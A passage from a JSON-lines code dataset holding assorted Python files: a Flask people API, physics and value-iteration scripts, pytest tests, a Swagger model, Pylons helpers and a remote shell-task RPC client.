jsonify({'message': 'Hello from futureproof DB!'}), 200\n\n@app.route('/people', methods=['GET', 'POST'])\ndef people_handler():\n fns = {\n 'GET': people.index,\n 'POST': people.create\n }\n resp, code = fns[request.method](request)\n return jsonify(resp), code\n\n@app.route('/people/', methods=['GET'])\ndef person_handler(people_id):\n fns = {\n 'GET': people.show\n }\n resp, code = fns[request.method](request, people_id)\n return jsonify(resp), code\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n return db\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\n\ndef init_db():\n with app.app_context():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\ndef query_db(query, args=(), one=False):\n cur = get_db().execute(query, args)\n get_db().commit()\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\n@app.errorhandler(exceptions.NotFound)\ndef handle_404(err):\n return {'message': f'Could not be found: {err}'}, 404\n\n@app.errorhandler(exceptions.BadRequest)\ndef handle_400(err):\n return {'message': f'Bad request: {err}'}, 400\n\n@app.errorhandler(exceptions.InternalServerError)\ndef handle_500(err):\n return {'message': f\"Internal Server Error: {err}\"}, 500\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"90551087","text":"from scipy import *\r\nimport matplotlib.pyplot as plt\r\n \r\n##plot the picture in 2D space, x,y describe the space.\r\n##A is a 1D array made of complex number \r\n##kvector is 3*N matrix, N is the same with A's len\r\n##Psi is a 2D array of the same size of x,y, made of complex number\r\n## J/j can be used directly to say a number is complex number\r\n \r\ndef wave_superposition(x, y, Amplitudes, Kvectors):\r\n assert len(x) == len(y)\r\n # assert len(Amplitudes) == len(Kvectors[:,0])\r\n N=len(Amplitudes)\r\n phi=zeros(x.shape, dtype=complex) # tell this one it is a complex number\r\n for i in range(N):\r\n phi+=Amplitudes[i]*exp(1j*(Kvectors[i,0]*x+Kvectors[i,1]*y)) #matric can be used directly\r\n return phi\r\n \r\n \r\nx,y=array([[1.0,2.0],[1.0,3.0]]), array([[2.0,4.0],[2.0,4.0]]) #use tuple, we need to say array \r\n \r\nk=array([[1.0,-1.0]]) #two [] to make it a 2D vector\r\n \r\nA= array([1.0+0j]) #A is a complex number, just put complex number inside?\r\n #r is a matric? r= array([x,y])\r\npsi= wave_superposition(x,y,A,k)\r\nprint(psi)\r\n","sub_path":"Dropbox/workspace/pythoncode/PAP723/problem_set0/wavefunction2.py","file_name":"wavefunction2.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"176917715","text":"from backend import get_board, get_coordinates, get_data, get_tile_id, get_tile_rotation\nimport pytest\n\n@pytest.mark.parametrize(\"map_name\", [\"test_1\", \"test_2\", \"test_3\"])\ndef test_get_coordinates_returns_list(map_name):\n \"\"\"Test that get_coordinates() returns a list for each map.\"\"\"\n data = get_data(\"maps/\" + map_name + \".json\")\n coordinates = get_coordinates(data)\n assert isinstance(coordinates, list)\n\n\n# Set of tests checking the structure of read JSON file (supposed to come from Tiled 1.2)\ndef test_map_returns_correct_data_list():\n \"\"\"Take JSON file with test_1 map and assert correct data list.\n\n If the test_1.json map is changed or removed, the test needs to be updated.\"\"\"\n data = get_data(\"maps/test_1.json\")\n assert data[\"layers\"][0][\"data\"] == [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2]\n\n\n@pytest.mark.parametrize((\"id_number\", \"expected_value\"),\n [(0, 0),\n (2, 2),\n (4, 6),\n (6, 9),\n (13, 16),])\ndef test_map_returns_correct_image_ID(id_number, expected_value):\n \"\"\"Take JSON file with test_1 map and assert correct image ID.\n\n If the test_1.json map is changed or removed, the test needs to be updated.\"\"\"\n data = get_data(\"maps/test_1.json\")\n assert data[\"tilesets\"][0][\"tiles\"][id_number][\"id\"] == expected_value\n\n\n@pytest.mark.parametrize((\"id_number\", \"expected_value\"),\n [(0, \"../img/squares/png/ground.png\"),\n (2, \"../img/squares/png/laser_1_base.png\"),\n (4, \"../img/squares/png/gear_r.png\"),\n (6, \"../img/squares/png/pusher_1_3_5.png\"),\n (13, \"../img/squares/png/laser_2.png\"),])\ndef test_map_returns_correct_image_path(id_number, expected_value):\n \"\"\"Take JSON file with test_1 map and assert correct image path.\n\n If the test_1.json map is changed or removed, the test needs to be updated.\"\"\"\n data = get_data(\"maps/test_1.json\")\n assert data[\"tilesets\"][0][\"tiles\"][id_number][\"image\"] == expected_value\n\n\ndef test_get_board_instance():\n \"\"\" Take JSON file with test_3 map and assert correct tilelist is returned.\n\n If the test_3.json map is changed or removed, the test needs to be updated.\"\"\"\n\n data = get_data(\"maps/test_3.json\")\n board = get_board(data)\n assert isinstance(board, dict)\n assert isinstance(board[1], dict)\n\n@pytest.mark.parametrize((\"input_number\", \"converted_number\"),\n [(1, 1),\n (2684354573, 13),\n (2684354584, 24),\n (1610612749, 13)])\ndef test_convert_tile_id(input_number, converted_number):\n assert get_tile_id(input_number) == converted_number\n\n\n@pytest.mark.parametrize((\"input_number\", \"converted_number\"),\n [(1, 0),\n (2684354573, 10),\n (2684354584, 10),\n (1610612749, 6),\n (3221225497, 12)])\ndef test_convert_tile_rotation(input_number, converted_number):\n assert get_tile_rotation(input_number) == converted_number\n","sub_path":"test_backend.py","file_name":"test_backend.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"327495641","text":"\"\"\"\nCopyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.\nUse of this source code is governed by a BSD-style license that can be found in the LICENSE file.\nAuthors and contributors: Eric Shook (eshook@kent.edu); Zhengliang Feng (odayfans@gmail.com, zfeng2@kent.edu)\n\"\"\"\nfrom .BoundingBox import *\nimport itertools\nimport PCMLConfig\nfrom .PCMLPrims import *\nimport multiprocessing as mp\nclass Subdomain(BoundingBox):\n \"\"\"Subdomain class represents a subdomain (portion) of a layer.\"\"\"\n\n def __init__(self, y, x, h, w, title):\n \"\"\"Create a new subdomain object.\n :class:`Subdomain` objects are generators, iterating over a subdomain object will give you all locations in the subdomain.\n Args:\n :param y (double): The y location (lower left corner typically) of the :class:`BoundingBox`.\n :param x (double): The x location (lower left corner typically) of the :class:`BoundingBox`. \n :param h (double): The height of the :class:`BoundingBox`. \n :param w (double): The width of the :class:`BoundingBox`. \n :param title (str): title(name) of the portion\n \"\"\"\n super(Subdomain, self).__init__(y, x, h, w)\n self.title=title\n\n # Only valid when data_structure==Datastructure.array\n self.r=None\n self.c=None\n #iter count is used to check whether the processing for subdomain is done at scheduler level. If it is 0 then the subdomain won't be processed any more\n if PCMLConfig.exectype==ExecutorType.serialpython:\n self.itercount=0\n elif PCMLConfig.exectype==ExecutorType.parallelpythonqueue:\n self.itercount=mp.Value('i',0)\n #getter for iter count\n def get_itercount(self):\n if PCMLConfig.exectype==ExecutorType.serialpython:\n return self.itercount\n else:\n return self.itercount.value\n def set_itercount(self,val):\n if PCMLConfig.exectype==ExecutorType.serialpython:\n self.itercount=val\n else:\n self.itercount.value=val\n\n def __repr__(self):\n return \"\" % (self.y,self.x,self.h,self.w,self.title)\n\n","sub_path":"pcml/core/Subdomain.py","file_name":"Subdomain.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"383434719","text":"def day_totals(month, year):\n\t\"\"\" Clinton daily totals from Schedual A CSV \"\"\"\n\tmonth_str = '\"' + str(month)\n\tyear_str = str(year) + '\"'\n\tdaily_totals = {}\n\tmonthly_sum = 0\n\n\twith open('csv_utils/db/hillary_schedA.csv', 'r') as f:\n\t\tfor line in f.readlines():\n\t\t\t# split lines at the commas\n\t\t\trow_values = line.split(',')\n\t\t\t# get the date, make it an array\n\t\t\tdate = row_values[8].split('/')\n\t\t\t# for every row that is in the desired month and year\n\t\t\tif date[0] == month_str and date[2] == year_str:\n\t\t\t\tday = int(date[1])\n\t\t\t\t# if the day is not yet in the daily totals, add it to the dictionary\n\t\t\t\tif day not in daily_totals.keys():\n\t\t\t\t\tdaily_totals[day] = 0\n\t\t\t\t# get the amount from the row, remove the quotes and dollar sign\n\t\t\t\tamount = float(row_values[9][2:-1])\n\t\t\t\t# add the row amount to the monthly sum\n\t\t\t\tmonthly_sum += amount\n\t\t\t\t# add the row amount to that day's daily total\n\t\t\t\tdaily_totals[day] += amount\n\t\t\telse: \n\t\t\t\tpass # go to next line in csv file\n\t\t\t\t\n\treturn daily_totals, monthly_sum\n\n\ndef monthly_total_per_day(daily_totals):\n\tmonthly_totals = {}\n\tmonth_total = 0\n\tfor day in daily_totals:\n\t\tmonth_total += daily_totals[day]\n\t\tmonthly_totals[day] = month_total\n\treturn monthly_totals\n\n# print('start')\n# daily_totals, month_sum = hillary_daily_totals()\n# print('------ Daily Totals ------')\n# for day in daily_totals:\n# \tprint(day, daily_totals[day])\n# print('Month Sum Function 1:', month_sum)\n\n# print('------ Month Sum Function 2 ------')\n# monthly_totals = monthly_total_per_day(daily_totals)\n# for day in monthly_totals:\n# \tprint(day, monthly_totals[day])\n","sub_path":"csv_utils/hillary.py","file_name":"hillary.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"601462126","text":"import logging\n\nimport ocdskingfisherprocess.cli.commands.base\nimport ocdskingfisherprocess.database\n\n\nclass UpdateCollectionCachesCLICommand(ocdskingfisherprocess.cli.commands.base.CLICommand):\n command = 'update-collection-caches'\n\n def run_command(self, args):\n logger = logging.getLogger('ocdskingfisher.cli.update-collection-caches')\n logger.info(\"Starting command\")\n\n for collection in self.database.get_all_collections():\n if collection.store_end_at:\n if not args.quiet:\n print(\"Collection \" + str(collection.database_id))\n logger.info(\"Starting to update caches for collection \" + str(collection.database_id))\n self.database.update_collection_cached_columns(collection.database_id)\n","sub_path":"ocdskingfisherprocess/cli/commands/update_collection_caches.py","file_name":"update_collection_caches.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"313680867","text":"def sumNumbers(s):\n\tl = len(s)\n\tinteg = []\n\ti = 0\n\twhile i < l:\n\t\ts_int = ''\n\t\ta = s[i]\n\t\twhile '0' <= a <= '9':\n\t\t\ts_int += a\n\t\t\ti += 1\n\t\t\tif i < l:\n\t\t\t\ta = s[i]\n\t\t\telse:\n\t\t\t\tbreak\n\t\ti += 1\n\t\tif s_int != '':\n\t\t\tinteg.append(int(s_int))\n \n\treturn sum(integ)\n\nprint(sumNumbers('123wer24r'))","sub_path":"allProgramms/helpforpyt/sum of numbers.py","file_name":"sum of numbers.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"266089687","text":"# coding: utf-8\n\n\"\"\"\n BinckBank.OpenApi\n\n BinckBank OpenAPI is an API Platform to access BinckBank's trading services. Curious? Request your access key after reading the documentation on Github: https://github.com/binckbank-api/client-js#binck-openapi-documentation # noqa: E501\n\n OpenAPI spec version: v1\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.configuration import Configuration\n\n\nclass DerivativesInfoModel(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'underlying_instrument_id': 'str',\n 'strike': 'float',\n 'strike_decimals': 'int',\n 'option_type': 'str',\n 'contract_size': 'float',\n 'expiration_date': 'datetime'\n }\n\n attribute_map = {\n 'underlying_instrument_id': 'underlyingInstrumentId',\n 'strike': 'strike',\n 'strike_decimals': 'strikeDecimals',\n 'option_type': 'optionType',\n 'contract_size': 'contractSize',\n 'expiration_date': 'expirationDate'\n }\n\n def __init__(self, underlying_instrument_id=None, strike=None, strike_decimals=None, option_type=None, contract_size=None, expiration_date=None, _configuration=None): # noqa: E501\n \"\"\"DerivativesInfoModel - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._underlying_instrument_id = None\n self._strike = None\n self._strike_decimals = None\n self._option_type = None\n self._contract_size = None\n self._expiration_date = None\n self.discriminator = None\n\n if underlying_instrument_id is not None:\n self.underlying_instrument_id = underlying_instrument_id\n if strike is not None:\n self.strike = strike\n if strike_decimals is not None:\n self.strike_decimals = strike_decimals\n if option_type is not None:\n self.option_type = option_type\n if contract_size is not None:\n self.contract_size = contract_size\n if expiration_date is not None:\n self.expiration_date = expiration_date\n\n @property\n def underlying_instrument_id(self):\n \"\"\"Gets the underlying_instrument_id of this DerivativesInfoModel. # noqa: E501\n\n Instrument Id # noqa: E501\n\n :return: The underlying_instrument_id of this DerivativesInfoModel. # noqa: E501\n :rtype: str\n \"\"\"\n return self._underlying_instrument_id\n\n @underlying_instrument_id.setter\n def underlying_instrument_id(self, underlying_instrument_id):\n \"\"\"Sets the underlying_instrument_id of this DerivativesInfoModel.\n\n Instrument Id # noqa: E501\n\n :param underlying_instrument_id: The underlying_instrument_id of this DerivativesInfoModel. # noqa: E501\n :type: str\n \"\"\"\n\n self._underlying_instrument_id = underlying_instrument_id\n\n @property\n def strike(self):\n \"\"\"Gets the strike of this DerivativesInfoModel. # noqa: E501\n\n Strike price # noqa: E501\n\n :return: The strike of this DerivativesInfoModel. # noqa: E501\n :rtype: float\n \"\"\"\n return self._strike\n\n @strike.setter\n def strike(self, strike):\n \"\"\"Sets the strike of this DerivativesInfoModel.\n\n Strike price # noqa: E501\n\n :param strike: The strike of this DerivativesInfoModel. # noqa: E501\n :type: float\n \"\"\"\n\n self._strike = strike\n\n @property\n def strike_decimals(self):\n \"\"\"Gets the strike_decimals of this DerivativesInfoModel. # noqa: E501\n\n Maximum number of decimals in strike price # noqa: E501\n\n :return: The strike_decimals of this DerivativesInfoModel. # noqa: E501\n :rtype: int\n \"\"\"\n return self._strike_decimals\n\n @strike_decimals.setter\n def strike_decimals(self, strike_decimals):\n \"\"\"Sets the strike_decimals of this DerivativesInfoModel.\n\n Maximum number of decimals in strike price # noqa: E501\n\n :param strike_decimals: The strike_decimals of this DerivativesInfoModel. # noqa: E501\n :type: int\n \"\"\"\n\n self._strike_decimals = strike_decimals\n\n @property\n def option_type(self):\n \"\"\"Gets the option_type of this DerivativesInfoModel. # noqa: E501\n\n Option type (put or call) # noqa: E501\n\n :return: The option_type of this DerivativesInfoModel. # noqa: E501\n :rtype: str\n \"\"\"\n return self._option_type\n\n @option_type.setter\n def option_type(self, option_type):\n \"\"\"Sets the option_type of this DerivativesInfoModel.\n\n Option type (put or call) # noqa: E501\n\n :param option_type: The option_type of this DerivativesInfoModel. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"put\", \"call\"] # noqa: E501\n if (self._configuration.client_side_validation and\n option_type not in allowed_values):\n raise ValueError(\n \"Invalid value for `option_type` ({0}), must be one of {1}\" # noqa: E501\n .format(option_type, allowed_values)\n )\n\n self._option_type = option_type\n\n @property\n def contract_size(self):\n \"\"\"Gets the contract_size of this DerivativesInfoModel. # noqa: E501\n\n Contract size # noqa: E501\n\n :return: The contract_size of this DerivativesInfoModel. # noqa: E501\n :rtype: float\n \"\"\"\n return self._contract_size\n\n @contract_size.setter\n def contract_size(self, contract_size):\n \"\"\"Sets the contract_size of this DerivativesInfoModel.\n\n Contract size # noqa: E501\n\n :param contract_size: The contract_size of this DerivativesInfoModel. # noqa: E501\n :type: float\n \"\"\"\n\n self._contract_size = contract_size\n\n @property\n def expiration_date(self):\n \"\"\"Gets the expiration_date of this DerivativesInfoModel. # noqa: E501\n\n Expiration date # noqa: E501\n\n :return: The expiration_date of this DerivativesInfoModel. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._expiration_date\n\n @expiration_date.setter\n def expiration_date(self, expiration_date):\n \"\"\"Sets the expiration_date of this DerivativesInfoModel.\n\n Expiration date # noqa: E501\n\n :param expiration_date: The expiration_date of this DerivativesInfoModel. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._expiration_date = expiration_date\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(DerivativesInfoModel, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DerivativesInfoModel):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, DerivativesInfoModel):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"swagger_client/models/derivatives_info_model.py","file_name":"derivatives_info_model.py","file_ext":"py","file_size_in_byte":8655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"195812702","text":"# runtime: 85.28%, memory usage: 43.17%\ndef toHex(num: int) -> str:\n result = \"\"\n\n for _ in range(8):\n digit = num & 0b1111\n result = \"0123456789abcdef\"[digit] + result\n num >>= 4\n\n if num == 0:\n break\n\n return result\n\n\nif __name__ == '__main__':\n result = toHex(26)\n print(result) # \"1a\"","sub_path":"lc_solutions/bit_manipulation/convert_a_number_to_hexadecimal-405/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"531937836","text":"#-*- coding: utf-8 -*-\n\"\"\"Helper functions\n\nConsists of functions to typically be used within templates, but also\navailable to Controllers. This module is available to templates as 'h'.\n\"\"\"\n# Import helpers as desired, or define your own, ie:\n#from webhelpers.html.tags import checkbox, password\nfrom pylons import session, request, response, url\nfrom pylons.i18n import get_lang, set_lang\nfrom pylons.i18n.translation import _, ungettext\nfrom decorator import decorator\nimport json\n\ndef styleProjectName(name):\n plase_ad = name.lower().find('ad',len(name)-2,len(name))\n if plase_ad > 0 :\n result = '' +\\\n name[0:plase_ad] +\\\n 'ad'\n else:\n result = name\n return result\n\n@decorator\ndef localize(f, *args, **kwargs):\n if 'lang' in session:\n lang = session['lang']\n set_lang(lang)\n else:\n suport_lang = ['ru','en','uk']\n suport_domain = ['cleverad.yt:5000','10.0.0.8:5000']\n default_lang = 'ru'\n lang_cookie = request.cookies.get('lang', None)\n if not lang_cookie in suport_lang:\n lang_cookie = None\n domain = request.environ.get('HTTP_HOST', None)\n if not domain in suport_domain:\n domain = None\n if lang_cookie != None:\n lang = lang_cookie\n else:\n if domain == 'cleverad.yt:5000':\n lang = 'en'\n elif domain == '10.0.0.8:5000':\n lang = 'uk'\n elif domain == '10.0.0.8':\n lang = 'ru'\n else:\n lang = default_lang\n session['lang'] = lang\n session.save()\n set_lang(lang)\n response.set_cookie('lang', lang, max_age=360*24*3600 )\n return f(*args, **kwargs)\ndef rulesLink(link):\n rulesLink= []\n curentRulesTitle = _(u'Текущая версия')\n oldRulesTitle = _(u'Предыдущая версия')\n rulesLink.append(\"
\")\n curentUrl = url.current()\n if len(link) > 0:\n for item in link:\n urlLink = curentUrl +\"/\"+ item.strftime(\"%Y-%m-%d-%H-%M-%S\")\n urlLink = '' + oldRulesTitle + ' ' + item.strftime(\"%Y-%m-%d %H:%M:%S\") + ''\n rulesLink.append(\"\")\n rulesLink.append(urlLink)\n rulesLink.append(\"\")\n else:\n urlLink = curentUrl[0:(curentUrl.lower().find('/rules') + 6)]\n urlLink = '' + curentRulesTitle + ''\n rulesLink.append(\"\")\n rulesLink.append(urlLink)\n rulesLink.append(\"\")\n rulesLink.append(\"
\")\n rulesLink = \" \".join(rulesLink)\n return rulesLink\ndef JSON(obj):\n \"\"\"Возвращает JSON-представление объекта obj\"\"\"\n return json.dumps(obj, ensure_ascii=False)\n\ndef jgridDataWrapper(data, page=None, records_on_page=None, count=None, total_pages=None,\n json=True):\n \"\"\" Принимает список значений колонок и возвращает json для таблиц jqGrid.\n Строит пейджинг по массиву данных или передает параметры пейджинга передаваемые\n ему на вход (при условии организации пейджинга с учётом выборки с бд)\n Для организации пейджинга из массива данных можно передать параметры ``page`` -- номер\n текущей страницы, ``records_on_page`` -- количество записей на одной\n странице.\n Для организации пейджинга при условии организации с учётом выборки с бд можно передать параметры\n ``page`` -- номер текущей страницы, ``count``- колво записей, ``total_pages`` - колво страниц.\n \"\"\"\n if count is None and total_pages is None:\n records = len(data)\n if page is not None and records_on_page is not None:\n try:\n page = int(page)\n except ValueError:\n page = 1\n\n try:\n records_on_page = int(records_on_page)\n except ValueError:\n records_on_page = 20\n\n if page == 0:\n page = 1\n start_record = (page - 1) * records_on_page\n end_record = page * records_on_page\n total_pages = (records-1) / records_on_page + 1\n data = data[start_record:end_record]\n records = len(data)\n else:\n if records:\n total_pages = page = 1\n else:\n total_pages = page = 0\n else:\n records = int(count)\n try:\n total_pages = int(total_pages)\n except ValueError:\n total_pages = 1\n try:\n page = int(page)\n except ValueError:\n page = 1\n \n output = {'total': total_pages,\n 'page': page,\n 'records': records,\n 'rows': [{'cell': x, 'id': index + 1}\n for index,x in enumerate(data)]\n }\n return JSON(output) if json else output\ndef trim_by_words(str, max_len):\n ''' Обрезает строку ``str`` до длины не более ``max_len`` с учётом слов '''\n if len(str) <= max_len:\n return str\n trimmed_simple = str[:max_len]\n trimmed_by_words = trimmed_simple.rpartition(' ')[0]\n return u'%s…' % (trimmed_by_words or trimmed_simple)\n","sub_path":"help/1.0/help/lib/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"435807959","text":"#!/usr/bin/env python3\n\nimport argparse\nimport asyncio\nimport os\nimport sys\n\nfrom rpcudp.protocol import RPCProtocol\n\nreturn_code = 1 # by default assume there was a problem invoking the remote task\n\n\n# A custom asyncio protocol used for capturing stdin of the Python process\nclass StdinCaptureProtocol(asyncio.Protocol):\n def __init__(self, protocol, host):\n self.protocol = protocol\n self.host = host\n\n def data_received(self, data):\n self.protocol.consume_input(self.host, data)\n\n def connection_lost(self, exc):\n self.protocol.consume_input(self.host, str.encode('\\4')) # End Of Transmission (EOT) character\n super().connection_lost(exc)\n\n\n# Any methods starting with \"rpc_\" are available to clients.\nclass RPCServer(RPCProtocol):\n def rpc_consume_stdout(self, sender, output):\n print(output.decode(\"utf-8\").rstrip('\\n'), flush=True)\n\n def rpc_consume_stderr(self, sender, output):\n print(output.decode(\"utf-8\").rstrip('\\n'), file=sys.stderr, flush=True)\n\n def rpc_consume_return_code(self, sender, retval):\n global return_code\n return_code = retval\n loop.stop()\n\n\nasync def exec_shell(protocol, address, command):\n await protocol.exec_shell(address, command)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('command', help='shell command to run on the remote server')\nparser.add_argument('--host-address',\n help='Address of the RPC server. Defaults to 127.0.0.1 or RTASK_HOST_ADDRESS environment variable (if set).',\n default=os.environ.get('RTASK_HOST_ADDRESS', '127.0.0.1'))\nparser.add_argument('--host-port', type=int,\n help='Port of the server. Defaults to 1234 or RTASK_HOST_PORT environment variable (if set).',\n default=os.environ.get('RTASK_HOST_PORT', 1234))\nparser.add_argument('--client-address',\n help='Address of the RPC client. Defaults to 127.0.0.1 or RTASK_CLIENT_ADDRESS environment variable (if set).',\n default=os.environ.get('RTASK_CLIENT_ADDRESS', '127.0.0.1'))\nparser.add_argument('--client-port', type=int,\n help='Port of the client. Defaults to OS-chosen or RTASK_CLIENT_PORT environment variable (if set).',\n default=os.environ.get('RTASK_CLIENT_PORT', None))\nargs = parser.parse_args()\n\n\n# Start local UDP server to be able to handle responses\nloop = asyncio.get_event_loop()\nlisten = loop.create_datagram_endpoint(RPCServer, local_addr=(args.client_address, args.client_port))\ntransport, protocol = loop.run_until_complete(listen)\n\n# Call remote UDP server to say hi\ncoroutine = exec_shell(protocol, (args.host_address, args.host_port), args.command)\nloop.run_until_complete(coroutine)\nloop.run_until_complete(loop.connect_read_pipe(lambda: StdinCaptureProtocol(protocol, (args.host_address, args.host_port)), sys.stdin))\nloop.run_forever()\nsys.exit(return_code)\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"518537757","text":"import numpy as np\r\nfrom vi_util import getIndexOfState, getPolicyForGrid, printPolicyForGrid, P\r\n\r\n\r\n#### Initialization ####\r\n\r\n\r\nclass State:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n\r\n### value iteration inputs ###\r\nS = [State(1, 1), State(1, 2), State(1, 3), State(1, 4),\r\n State(2, 1), State(2, 3), State(2, 4),\r\n State(3, 1), State(3, 2), State(3, 3), State(3, 4)]\r\n\r\nA = ['u', 'r', 'd', 'l']\r\n\r\nP = P\r\n\r\n# make a version of R_states with changeable rewards\r\nR_states = np.array([-.04, -.04, -.04, 1,\r\n -.04, -.04, -1,\r\n -.04, -.04, -.04, -.04])\r\n\r\n# make a version of discount with changeable discount\r\ndiscount = 1\r\n\r\n# values not reward\r\ntr = [3, 6]\r\n\r\nU = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0])\r\n\r\nU_prime = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0, 0.0, 0.0, 0.0, 1.0])\r\n\r\nU.astype(float)\r\nU_prime.astype(float)\r\n\r\n\r\ndef getExpectedUtility(S, s, discount):\r\n \"\"\"\r\n\r\n :param S:\r\n :param s:\r\n :param discount:\r\n :return:\r\n \"\"\"\r\n index_of_state = getIndexOfState(S, s.x, s.y)\r\n\r\n if index_of_state == 0:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[1] + .1 * U[4] + .1 * U[0], # up\r\n .9 * U[0] + .1 * U[1], # left\r\n .9 * U[0] + .1 * U[4], # down\r\n .8 * U[4] + .1 * U[1] + .1 * U[0])) # right\r\n if index_of_state == 1:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[1] + .1 * U[2] + .1 * U[0], # up\r\n .9 * U[0] + .1 * U[2], # left\r\n .8 * U[1] + .1 * U[0] + .1 * U[2], # down\r\n .9 * U[2] + .1 * U[0])) # right\r\n if index_of_state == 2:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[5] + .1 * U[1] + .1 * U[3], # up\r\n .9 * U[1] + .1 * U[5], # left\r\n .8 * U[2] + .1 * U[1] + .1 * U[3], # down\r\n .9 * U[3] + .1 * U[5])) # right\r\n if index_of_state == 3:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[6] + .1 * U[2] + .1 * U[3], # up\r\n .9 * U[2] + .1 * U[6], # left\r\n .9 * U[3] + .1 * U[6], # down\r\n .9 * U[3] + .1 * U[2], )) # right\r\n if index_of_state == 4:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[7] + .1 * U[4] + .1 * U[0], # up\r\n .8 * U[4] + .1 * U[7] + .1 * U[0], # left\r\n .8 * U[4] + .1 * U[7] + .1 * U[0], # right\r\n .8 * U[0] + .1 * U[4] + .1 * U[7])) # down\r\n if index_of_state == 5:\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[9] + .1 * U[6] + .1 * U[5], # up\r\n .8 * U[5] + .1 * U[9] + .1 * U[2], # left\r\n .8 * U[6] + .1 * U[9] + .1 * U[2], # right\r\n .8 * U[2] + .1 * U[5] + .1 * U[5])) # down\r\n if index_of_state == 6: # terminate ?\r\n uP = R_states[index_of_state] + (discount * max(.8 * U[10] + .1 * U[4] + .1 * U[0], # up\r\n .9 * U[5] + .1 * U[1], # left\r\n .9 * U[0] + .1 * 